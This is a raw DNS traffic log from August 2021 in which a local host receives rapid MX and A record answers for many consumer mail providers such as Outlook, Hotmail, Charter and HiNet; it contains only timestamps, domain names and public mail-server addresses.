Aug 24, 2021 08:47:50.270613909 CEST	8.8.8.8	192.168.2.7	0x9bac	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:50.416435957 CEST	8.8.8.8	192.168.2.7	0x669f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:50.416435957 CEST	8.8.8.8	192.168.2.7	0x669f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:50.994828939 CEST	8.8.8.8	192.168.2.7	0xd6ae	No error (0)	live.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:51.046948910 CEST	8.8.8.8	192.168.2.7	0xd891	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.046948910 CEST	8.8.8.8	192.168.2.7	0xd891	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.047028065 CEST	8.8.8.8	192.168.2.7	0xc42c	No error (0)	hotmail.co.uk			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:51.050235987 CEST	8.8.8.8	192.168.2.7	0x8ad2	No error (0)	live-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.050235987 CEST	8.8.8.8	192.168.2.7	0x8ad2	No error (0)	live-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.095794916 CEST	8.8.8.8	192.168.2.7	0xda70	No error (0)	eur.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.095794916 CEST	8.8.8.8	192.168.2.7	0xda70	No error (0)	eur.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.108587027 CEST	8.8.8.8	192.168.2.7	0x3c9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.108587027 CEST	8.8.8.8	192.168.2.7	0x3c9	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.292560101 CEST	8.8.8.8	192.168.2.7	0xe822	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.292560101 CEST	8.8.8.8	192.168.2.7	0xe822	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.301549911 CEST	8.8.8.8	192.168.2.7	0x7282	No error (0)	charter.net			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:51.383733034 CEST	8.8.8.8	192.168.2.7	0x2fba	No error (0)	mx0.charter.net		47.43.18.9	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.506721020 CEST	8.8.8.8	192.168.2.7	0x9428	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.506721020 CEST	8.8.8.8	192.168.2.7	0x9428	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.622622967 CEST	8.8.8.8	192.168.2.7	0x51e7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.622622967 CEST	8.8.8.8	192.168.2.7	0x51e7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.871423006 CEST	8.8.8.8	192.168.2.7	0xb8a8	No error (0)	barkochicomail.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:51.871423006 CEST	8.8.8.8	192.168.2.7	0xb8a8	No error (0)	barkochicomail.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:51.871423006 CEST	8.8.8.8	192.168.2.7	0xb8a8	No error (0)	barkochicomail.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:51.871423006 CEST	8.8.8.8	192.168.2.7	0xb8a8	No error (0)	barkochicomail.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:51.937743902 CEST	8.8.8.8	192.168.2.7	0x17b8	No error (0)	live.co.uk			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:51.950653076 CEST	8.8.8.8	192.168.2.7	0x196f	No error (0)	smtp-mx10d4.mixmail.com.mx		169.47.40.43	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.990842104 CEST	8.8.8.8	192.168.2.7	0x9735	No error (0)	eur.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:51.990842104 CEST	8.8.8.8	192.168.2.7	0x9735	No error (0)	eur.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:52.186570883 CEST	8.8.8.8	192.168.2.7	0x7ff0	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:52.186570883 CEST	8.8.8.8	192.168.2.7	0x7ff0	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:52.192112923 CEST	8.8.8.8	192.168.2.7	0xe4f2	No error (0)	live-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:52.192112923 CEST	8.8.8.8	192.168.2.7	0xe4f2	No error (0)	live-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:52.707314014 CEST	8.8.8.8	192.168.2.7	0xefee	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:52.707314014 CEST	8.8.8.8	192.168.2.7	0xefee	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:52.921178102 CEST	8.8.8.8	192.168.2.7	0x5055	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:52.921178102 CEST	8.8.8.8	192.168.2.7	0x5055	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.018769026 CEST	8.8.8.8	192.168.2.7	0x523	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.018769026 CEST	8.8.8.8	192.168.2.7	0x523	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.435579062 CEST	8.8.8.8	192.168.2.7	0x6ffb	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.435579062 CEST	8.8.8.8	192.168.2.7	0x6ffb	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.546762943 CEST	8.8.8.8	192.168.2.7	0x71e1	No error (0)	msn-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.546762943 CEST	8.8.8.8	192.168.2.7	0x71e1	No error (0)	msn-com.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.568717957 CEST	8.8.8.8	192.168.2.7	0xe901	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.568717957 CEST	8.8.8.8	192.168.2.7	0xe901	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.721900940 CEST	8.8.8.8	192.168.2.7	0x49b4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.721900940 CEST	8.8.8.8	192.168.2.7	0x49b4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.931272984 CEST	8.8.8.8	192.168.2.7	0x3f44	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:53.931272984 CEST	8.8.8.8	192.168.2.7	0x3f44	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.135993004 CEST	8.8.8.8	192.168.2.7	0xb1d4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.135993004 CEST	8.8.8.8	192.168.2.7	0xb1d4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.244822025 CEST	8.8.8.8	192.168.2.7	0x72ef	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.244822025 CEST	8.8.8.8	192.168.2.7	0x72ef	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.262504101 CEST	8.8.8.8	192.168.2.7	0xb038	No error (0)	hotmail.fr			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:54.279831886 CEST	8.8.8.8	192.168.2.7	0x75c1	No error (0)	eur.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.279831886 CEST	8.8.8.8	192.168.2.7	0x75c1	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.587356091 CEST	8.8.8.8	192.168.2.7	0x2a55	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.587356091 CEST	8.8.8.8	192.168.2.7	0x2a55	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.588921070 CEST	8.8.8.8	192.168.2.7	0x381e	No error (0)	msn-com.olc.protection.outlook.com		104.47.56.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.588921070 CEST	8.8.8.8	192.168.2.7	0x381e	No error (0)	msn-com.olc.protection.outlook.com		104.47.57.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.672688007 CEST	8.8.8.8	192.168.2.7	0xb47c	No error (0)	live-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.672688007 CEST	8.8.8.8	192.168.2.7	0xb47c	No error (0)	live-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.764632940 CEST	8.8.8.8	192.168.2.7	0x5aab	No error (0)	eur.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.764632940 CEST	8.8.8.8	192.168.2.7	0x5aab	No error (0)	eur.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.941831112 CEST	8.8.8.8	192.168.2.7	0x6233	No error (0)	live-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.941831112 CEST	8.8.8.8	192.168.2.7	0x6233	No error (0)	live-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.952848911 CEST	8.8.8.8	192.168.2.7	0x3b4a	No error (0)	eur.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:54.952848911 CEST	8.8.8.8	192.168.2.7	0x3b4a	No error (0)	eur.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.141693115 CEST	8.8.8.8	192.168.2.7	0xd00b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.141693115 CEST	8.8.8.8	192.168.2.7	0xd00b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.159260988 CEST	8.8.8.8	192.168.2.7	0x5b8b	No error (0)	eur.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.159260988 CEST	8.8.8.8	192.168.2.7	0x5b8b	No error (0)	eur.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.246578932 CEST	8.8.8.8	192.168.2.7	0x6ea1	No error (0)	eur.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.246578932 CEST	8.8.8.8	192.168.2.7	0x6ea1	No error (0)	eur.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.352417946 CEST	8.8.8.8	192.168.2.7	0xb828	No error (0)	live-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.352417946 CEST	8.8.8.8	192.168.2.7	0xb828	No error (0)	live-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.479298115 CEST	8.8.8.8	192.168.2.7	0x1b2f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.479298115 CEST	8.8.8.8	192.168.2.7	0x1b2f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.479330063 CEST	8.8.8.8	192.168.2.7	0x1a82	No error (0)	eur.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.479330063 CEST	8.8.8.8	192.168.2.7	0x1a82	No error (0)	eur.olc.protection.outlook.com		104.47.18.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.681969881 CEST	8.8.8.8	192.168.2.7	0xf20a	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.681969881 CEST	8.8.8.8	192.168.2.7	0xf20a	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.747142076 CEST	8.8.8.8	192.168.2.7	0xcca1	No error (0)	mx0.charter.net		47.43.18.9	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.889533997 CEST	8.8.8.8	192.168.2.7	0x7f22	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:55.889533997 CEST	8.8.8.8	192.168.2.7	0x7f22	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.010759115 CEST	8.8.8.8	192.168.2.7	0x77a0	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.010759115 CEST	8.8.8.8	192.168.2.7	0x77a0	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.109137058 CEST	8.8.8.8	192.168.2.7	0x187e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.109137058 CEST	8.8.8.8	192.168.2.7	0x187e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.155805111 CEST	8.8.8.8	192.168.2.7	0xae07	No error (0)	hotmail.es			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:56.218522072 CEST	8.8.8.8	192.168.2.7	0x7c3e	No error (0)	eur.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.218522072 CEST	8.8.8.8	192.168.2.7	0x7c3e	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.313728094 CEST	8.8.8.8	192.168.2.7	0x11ed	No error (0)	live-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.313728094 CEST	8.8.8.8	192.168.2.7	0x11ed	No error (0)	live-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.498244047 CEST	8.8.8.8	192.168.2.7	0xb0de	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.498244047 CEST	8.8.8.8	192.168.2.7	0xb0de	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:56.663858891 CEST	8.8.8.8	192.168.2.7	0xbef3	No error (0)	hotmail.de			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:57.021260977 CEST	8.8.8.8	192.168.2.7	0x8d26	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:57.021260977 CEST	8.8.8.8	192.168.2.7	0x8d26	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:57.021271944 CEST	8.8.8.8	192.168.2.7	0xdee3	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:57.021271944 CEST	8.8.8.8	192.168.2.7	0xdee3	No error (0)	eur.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:57.351638079 CEST	8.8.8.8	192.168.2.7	0xb0c6	No error (0)	msn-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:57.351638079 CEST	8.8.8.8	192.168.2.7	0xb0c6	No error (0)	msn-com.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:57.479355097 CEST	8.8.8.8	192.168.2.7	0x679b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:57.479355097 CEST	8.8.8.8	192.168.2.7	0x679b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:57.564635992 CEST	8.8.8.8	192.168.2.7	0xdb86	No error (0)	eur.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:57.564635992 CEST	8.8.8.8	192.168.2.7	0xdb86	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:57.930521011 CEST	8.8.8.8	192.168.2.7	0xedef	No error (0)	eur.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:57.930521011 CEST	8.8.8.8	192.168.2.7	0xedef	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.026668072 CEST	8.8.8.8	192.168.2.7	0xc609	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.026668072 CEST	8.8.8.8	192.168.2.7	0xc609	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.043481112 CEST	8.8.8.8	192.168.2.7	0x2405	No error (0)	msa.hinet.net			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:58.043481112 CEST	8.8.8.8	192.168.2.7	0x2405	No error (0)	msa.hinet.net			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:58.078991890 CEST	8.8.8.8	192.168.2.7	0x73d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.078991890 CEST	8.8.8.8	192.168.2.7	0x73d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.082046986 CEST	8.8.8.8	192.168.2.7	0xc281	No error (0)	msa-smtp-mx1.hinet.net		168.95.6.54	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.082046986 CEST	8.8.8.8	192.168.2.7	0xc281	No error (0)	msa-smtp-mx1.hinet.net		168.95.6.60	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.082046986 CEST	8.8.8.8	192.168.2.7	0xc281	No error (0)	msa-smtp-mx1.hinet.net		168.95.6.55	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.082046986 CEST	8.8.8.8	192.168.2.7	0xc281	No error (0)	msa-smtp-mx1.hinet.net		168.95.6.59	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.082046986 CEST	8.8.8.8	192.168.2.7	0xc281	No error (0)	msa-smtp-mx1.hinet.net		168.95.6.51	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.082046986 CEST	8.8.8.8	192.168.2.7	0xc281	No error (0)	msa-smtp-mx1.hinet.net		168.95.6.58	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.082046986 CEST	8.8.8.8	192.168.2.7	0xc281	No error (0)	msa-smtp-mx1.hinet.net		168.95.6.52	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.082046986 CEST	8.8.8.8	192.168.2.7	0xc281	No error (0)	msa-smtp-mx1.hinet.net		168.95.6.56	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.082046986 CEST	8.8.8.8	192.168.2.7	0xc281	No error (0)	msa-smtp-mx1.hinet.net		168.95.6.53	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.082046986 CEST	8.8.8.8	192.168.2.7	0xc281	No error (0)	msa-smtp-mx1.hinet.net		168.95.6.57	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.298083067 CEST	8.8.8.8	192.168.2.7	0x55e5	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.298083067 CEST	8.8.8.8	192.168.2.7	0x55e5	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.556293964 CEST	8.8.8.8	192.168.2.7	0x34c4	No error (0)	roc.gr			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:58.556293964 CEST	8.8.8.8	192.168.2.7	0x34c4	No error (0)	roc.gr			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:58.556293964 CEST	8.8.8.8	192.168.2.7	0x34c4	No error (0)	roc.gr			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:47:58.634541988 CEST	8.8.8.8	192.168.2.7	0x87f7	No error (0)	mx20.mailspamprotection.com		35.192.5.156	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.634541988 CEST	8.8.8.8	192.168.2.7	0x87f7	No error (0)	mx20.mailspamprotection.com		35.223.167.9	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.634541988 CEST	8.8.8.8	192.168.2.7	0x87f7	No error (0)	mx20.mailspamprotection.com		146.66.121.164	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.634541988 CEST	8.8.8.8	192.168.2.7	0x87f7	No error (0)	mx20.mailspamprotection.com		35.206.93.214	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.634541988 CEST	8.8.8.8	192.168.2.7	0x87f7	No error (0)	mx20.mailspamprotection.com		146.66.121.88	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.634541988 CEST	8.8.8.8	192.168.2.7	0x87f7	No error (0)	mx20.mailspamprotection.com		35.206.105.37	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.634541988 CEST	8.8.8.8	192.168.2.7	0x87f7	No error (0)	mx20.mailspamprotection.com		34.70.37.227	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.634541988 CEST	8.8.8.8	192.168.2.7	0x87f7	No error (0)	mx20.mailspamprotection.com		146.66.121.17	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.634541988 CEST	8.8.8.8	192.168.2.7	0x87f7	No error (0)	mx20.mailspamprotection.com		146.66.121.87	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.634541988 CEST	8.8.8.8	192.168.2.7	0x87f7	No error (0)	mx20.mailspamprotection.com		146.66.121.213	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.634541988 CEST	8.8.8.8	192.168.2.7	0x87f7	No error (0)	mx20.mailspamprotection.com		146.66.121.160	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.634541988 CEST	8.8.8.8	192.168.2.7	0x87f7	No error (0)	mx20.mailspamprotection.com		146.66.121.83	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.869709969 CEST	8.8.8.8	192.168.2.7	0xa42f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:58.869709969 CEST	8.8.8.8	192.168.2.7	0xa42f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:59.433381081 CEST	8.8.8.8	192.168.2.7	0x165e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:59.433381081 CEST	8.8.8.8	192.168.2.7	0x165e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:59.684489012 CEST	8.8.8.8	192.168.2.7	0x5ebc	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:47:59.684489012 CEST	8.8.8.8	192.168.2.7	0x5ebc	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:00.517615080 CEST	8.8.8.8	192.168.2.7	0x8739	No error (0)	live-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:00.517615080 CEST	8.8.8.8	192.168.2.7	0x8739	No error (0)	live-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:00.537261963 CEST	8.8.8.8	192.168.2.7	0x6300	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:00.537261963 CEST	8.8.8.8	192.168.2.7	0x6300	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:00.547645092 CEST	8.8.8.8	192.168.2.7	0x77a2	No error (0)	eur.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:00.547645092 CEST	8.8.8.8	192.168.2.7	0x77a2	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:00.863007069 CEST	8.8.8.8	192.168.2.7	0x56a4	No error (0)	eur.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:00.863007069 CEST	8.8.8.8	192.168.2.7	0x56a4	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:01.078376055 CEST	8.8.8.8	192.168.2.7	0x79ba	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:01.078376055 CEST	8.8.8.8	192.168.2.7	0x79ba	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.273992062 CEST	8.8.8.8	192.168.2.7	0x67d6	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.273992062 CEST	8.8.8.8	192.168.2.7	0x67d6	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:02.275438070 CEST	8.8.8.8	192.168.2.7	0xa370	No error (0)	yahoo.com.au			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:02.275438070 CEST	8.8.8.8	192.168.2.7	0xa370	No error (0)	yahoo.com.au			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:02.275438070 CEST	8.8.8.8	192.168.2.7	0xa370	No error (0)	yahoo.com.au			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:02.276725054 CEST	8.8.8.8	192.168.2.7	0x4928	No error (0)	msn-com.olc.protection.outlook.com		104.47.56.33	A (IP address)	IN (0x0001)
